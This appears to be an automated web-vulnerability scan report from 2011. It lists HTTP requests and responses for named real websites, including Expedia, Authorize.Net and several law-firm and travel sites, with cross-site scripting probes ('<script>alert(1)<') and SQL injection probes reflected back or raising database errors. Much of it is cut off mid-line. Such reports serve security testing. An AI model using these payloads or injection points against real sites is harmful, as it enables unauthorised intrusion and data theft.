HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:52:32 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 3378 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/ ...[SNIP]... scs_tsu=aHR0cDovL2Fw ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tours.sapha.com |
Path: | / |
GET /?scs_sid=-111%27%20OR Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:13:28 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 3458 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/ ...[SNIP]... hvars" value="scs_tsu=aHR0c ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tours.sapha.com |
Path: | / |
GET /?scs_sid=2546&scs_tid= Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:35 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 603 </td></tr></table><b ...[SNIP]... </script>69442<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://verify.authorize |
Path: | /anetseal/ |
GET /anetseal/?pid=3de2b6f5 Host: verify.authorize.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:17:23 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI NID NAV" X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 5955 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head> <title>Authorize.Net Verified Merchant Seal</title> <meta name="GENERATOR" Content="Microsoft Visual St ...[SNIP]... <a href= https://www.clone-systems ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://widgets.digg.com |
Path: | /buttons/count |
GET /buttons/count?url=file Host: widgets.digg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: d=fb1af30888f0820a9f |
HTTP/1.1 200 OK Age: 0 Date: Fri, 06 May 2011 20:09:07 GMT Via: NS-CACHE: 100 Etag: "4ee52e4d9af28f6ad0b Content-Length: 205 Server: TornadoServer/0.1 Content-Type: application/json Accept-Ranges: bytes Cache-Control: private, max-age=599 Expires: Fri, 06 May 2011 20:19:06 GMT X-CDN: Cotendo Connection: Keep-Alive __DBW.collectDiggs({"url" |
Severity: | High |
Confidence: | Certain |
Host: | http://www.advisorsquare |
Path: | /useradmin/Authenticate |
GET /useradmin/Authenticate Host: www.advisorsquare.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 2188 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQABRSTCR X-Powered-By: ASP.NET Date: Sat, 07 May 2011 01:36:54 GMT <html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff > <form action="authenticate.asp" method="post"> ...[SNIP]... <input type="hidden" Name="ComeBack" value="/useradmin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.advisorsquare |
Path: | /useradmin/Authenticate |
GET /useradmin/Authenticate Host: www.advisorsquare.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 2233 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQABRSTCR X-Powered-By: ASP.NET Date: Sat, 07 May 2011 01:36:51 GMT <html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff > <form action="authenticate.asp" method="post"> ...[SNIP]... <input type="hidden" name="AdvisorID" value="85732f8cb1--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.advisorsquare |
Path: | /useradmin/Authenticate |
GET /useradmin/Authenticate Host: www.advisorsquare.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 2231 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQABRSTCR X-Powered-By: ASP.NET Date: Sat, 07 May 2011 01:36:51 GMT <html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff > <form action="authenticate.asp" method="post"> ...[SNIP]... <input type="hidden" name="GroupID" value="85732e9045"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.brownrudnick |
Path: | /nr/alertsArchv.asp |
GET /nr/alertsArchv.asp?Year Cookie: ASPSESSIONIDSSSASTRS Host: www.brownrudnick.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 Accept: */* |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 06 May 2011 18:47:10 GMT X-Powered-By: ASP.NET MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 13992 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQRDRRTT Cache-control: private <html> <head> <meta http-equiv="Content <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Brown Rudnick - Alerts and Newsletters - ...[SNIP]... </i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(Year = 2006431bc<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.brownrudnick |
Path: | /nr/articlesindv.asp |
GET /nr/articlesindv.asp?ID Pragma: no-cache Host: www.brownrudnick.com Connection: Keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 Accept: */* |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 06 May 2011 18:48:17 GMT X-Powered-By: ASP.NET MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 11278 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQRDRRTT Cache-control: private <html> <head> <meta http-equiv="Content <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Brown Rudnick - Articles</title> <link r ...[SNIP]... </script>ba5591b9a235d6aa<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /accommodation2.php |
GET /accommodation2.php?id Host: www.caribbean-ocean.com Proxy-Connection: keep-alive Referer: http://www.caribbean User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=lj6iq5k4nc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:24 GMT Server: Apache/2.2.4 (Linux/SUSE) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 9767 1054: Unknown column '82893ff42' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT area_id AS country_id FROM accommodation WHERE accomm_id = 82893ff42<a>78f0dfbcbea</textarea> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.caribbean |
Path: | /accommodation2.php |
GET /accommodation2.php?id=/42305%3balert(1)/ Host: www.caribbean-ocean.com Proxy-Connection: keep-alive Referer: http://www.caribbean User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=lj6iq5k4nc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:42 GMT Server: Apache/2.2.4 (Linux/SUSE) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 10262 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/42305;alert(1)/ FROM accommodation WHERE accomm_id = /42305;alert(1)/ ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /get-image.php |
GET /get-image.php?id=18696b4e6a<a>5d16744a2c HTTP/1.1 Referer: http://www.caribbean User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.caribbean-ocean.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 15:59:44 GMT Server: Apache/2.2.4 (Linux/SUSE) Content-Length: 847 Content-Type: image/jpg 1054: Unknown column '18696b4e6a' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT image FROM image WHERE image_id = 18696b4e6a<a>5d16744a2c</textarea> Warning: mysql_num_r ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /get-image.php |
GET /get-image.php?id=1/c0726<a>c9b4bd0777c8696 HTTP/1.1 Cookie: PHPSESSID=56e9tj63ar Host: www.caribbean-ocean.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 Accept: */* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 18:58:43 GMT Server: Apache/2.2.4 (Linux/SUSE) Content-Length: 844 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpg 1054: Unknown column 'c0726' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT image FROM image WHERE image_id = 1/c0726<a>c9b4bd0777c8696</textarea> Warning: mysql_num_rows ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.caribbean |
Path: | /luxury%20Barbados |
GET /luxury%20Barbados Host: www.caribbean-ocean.com Proxy-Connection: keep-alive Referer: http://www.caribbean User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=lj6iq5k4nc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:56 GMT Server: Apache/2.2.4 (Linux/SUSE) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 6943 <html> <head> <title>Luxury and exclusive Caribbean holidays in luxury</title> <meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD ...[SNIP]... <textarea rows="10" cols="100">SELECT * FROM area WHERE area_id IN (918cbea<script>alert(1)< ORDER BY area_name ASC</textarea> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.caribbean |
Path: | /luxury%20Jamaica |
GET /luxury%20Jamaica Host: www.caribbean-ocean.com Proxy-Connection: keep-alive Referer: http://www.caribbean User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=lj6iq5k4nc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:24 GMT Server: Apache/2.2.4 (Linux/SUSE) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 6944 <html> <head> <title>Luxury and exclusive Caribbean holidays in luxury</title> <meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD ...[SNIP]... <textarea rows="10" cols="100">SELECT * FROM area WHERE area_id IN (1054529a<script>alert(1)< ORDER BY area_name ASC</textarea> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.dhmiservices |
Path: | /ClickContact/js.ashx |
GET /ClickContact/js.ashx Host: www.dhmiservices.com Proxy-Connection: keep-alive Referer: http://www.agentadvantage User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 18:40:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/plain; charset=utf-8 Content-Length: 653 Set-Cookie: BIGipServerdhmweb_http function load2058797069() { var load = window.open('http:/ ...[SNIP]... <img src=\"http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.dhmiservices |
Path: | /ImageHandler.ashx |
GET /ImageHandler.ashx?img_id Host: www.dhmiservices.com Proxy-Connection: keep-alive Referer: http://www.agentadvantage User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 18:40:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/plain; charset=utf-8 Content-Length: 118 Set-Cookie: BIGipServerdhmweb_http Conversion failed when converting the nvarchar value '3824e1fbf<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://www.dominione |
Path: | /main/do/businesses/id/13 |
GET /main/do/businesses/id/13 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:40:25 GMT X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:40:25 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=f83cff2dc82 Content-Length: 23235 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Businesses</title> <base href="http://www <meta http-equi ...[SNIP]... <img_src/a_onerror/alert FOR BUSINESSES7DB69<IMG SRC=A ONERROR=ALERT(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.dominione |
Path: | /main/do/businesses/id/13 |
GET /main/do/businesses/id/13 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:40:19 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:40:19 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 23191 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Businesses</title> <base href="http://www <meta http-equi ...[SNIP]... <div class="secondary_nav_item ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.expedia.com |
Path: | /pub/agent.dll |
GET /pub/agent.dll?qscr=flex Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:38:22 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: s1=`user=v.8,0,EX013 Set-Cookie: p1=`tpid=v.1,1`accttype=v Content-Length: 109469 <!-- srvpush1 15:38:22(:749) --> <style type="text/css"> .intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;} .intchk ul{list-style-type: none; padding: 0; margin-left: 1em;} . ...[SNIP]... t.value=d; f.rfrr.value=r; f.frtp.value=t; f.fcqp.value=q f.submit(); } function SubmitRdat(q,d,t) { ResetFltWiz(); f.qscr.value='flxc'; f.mnth.value='5/1/2011'; f.ddat.value='5d43e';alert(1)/ f.fcqp.value=q; f.rdat.value=d; if(q) f.rfrr.value="-22530"; else f.rfrr.value="-22531"; f.frtp.value=t; f.submit(); } function StartOver() { f.subm.value= ''; f.qscr.value ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.expedia.com |
Path: | /pub/agent.dll |
GET /pub/agent.dll?qscr=logi Host: www.expedia.com Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:51:25 GMT Connection: keep-alive Connection: Transfer-Encoding Content-Length: 97453 <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi ...[SNIP]... (i==c&&ef)Foci(ef); } g_currSel=c; } } function SHErr(c) { var e=getObj("choice1errorid" if(e)e.style.display=(1! } function SelOptOnLoad() { selectOne(383116;alert(1)/ }AddLoadFn("SelOptOnLoad( //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ezflexplan.com |
Path: | /navigation/frameset.asp |
GET /navigation/frameset.asp Host: www.ezflexplan.com Proxy-Connection: keep-alive Referer: http://www.ezflexplan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCQSRSARR |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:44:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 962 Content-Type: text/html Cache-control: private <html> <head> <title>EzFlexPlan</title> <meta name="GENERATOR" content="Microsoft FrontPage 4.0"> <meta name="ProgId" content="FrontPage.Editor </head> <frameset border="0" fr ...[SNIP]... <frame name="leftnav" src="/ContentPages/nav_4e5ba"><script>alert(1)< scrolling="auto" frameborder="no"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ezflexplan.com |
Path: | /navigation/frameset.asp |
GET /navigation/frameset.asp Host: www.ezflexplan.com Proxy-Connection: keep-alive Referer: http://www.ezflexplan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCQSRSARR |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:44:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 866 Content-Type: text/html Cache-control: private <html> <head> <title>EzFlexPlan</title> <meta name="GENERATOR" content="Microsoft FrontPage 4.0"> <meta name="ProgId" content="FrontPage.Editor </head> <frameset border="0" fr ...[SNIP]... <frame name src="/navigation/menu.asp marginwidth="0" marginheight="0" scrolling="no" frameborder="no" style="text-align: Left"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ezflexplan.com |
Path: | /navigation/frameset.asp |
GET /navigation/frameset.asp Host: www.ezflexplan.com Proxy-Connection: keep-alive Referer: http://www.ezflexplan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCQSRSARR |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:44:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 892 Content-Type: text/html Cache-control: private <html> <head> <title>EzFlexPlan</title> <meta name="GENERATOR" content="Microsoft FrontPage 4.0"> <meta name="ProgId" content="FrontPage.Editor </head> <frameset border="0" fr ...[SNIP]... <frame name src="/navigation/menu.asp marginwidth="0" marginheight="0" scrolling="no" frameborder="no" style="text-align: Left"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ezflexplan.com |
Path: | /navigation/menu.asp |
GET /navigation/menu.asp?id Host: www.ezflexplan.com Proxy-Connection: keep-alive Referer: http://www.ezflexplan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCQSRSARR |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:44:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 3118 Content-Type: text/html Cache-control: private <html> <head> <title>EzFlexPlan Menu</title> <script LANGUAGE="JavaScript"> //HoverCraft MouseOver Script if (document.images) { var ImageDirectory = "../ ...[SNIP]... <a href="/navigation/contact onclick="parent.frames[1] target="mainbody" onmouseover="HoverCraft( onmou ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /aboutus/uniGC.aspx |
GET /aboutus/uniGC.aspx?xpST Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 23:42:25 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1844; path=/ Set-Cookie: PortletId=5981402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48974 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... <div id="PDFBuilderUrl">http:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /alan_kailer/ |
GET /alan_kailer/?d7874<script>alert(1)< Host: www.hunton.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
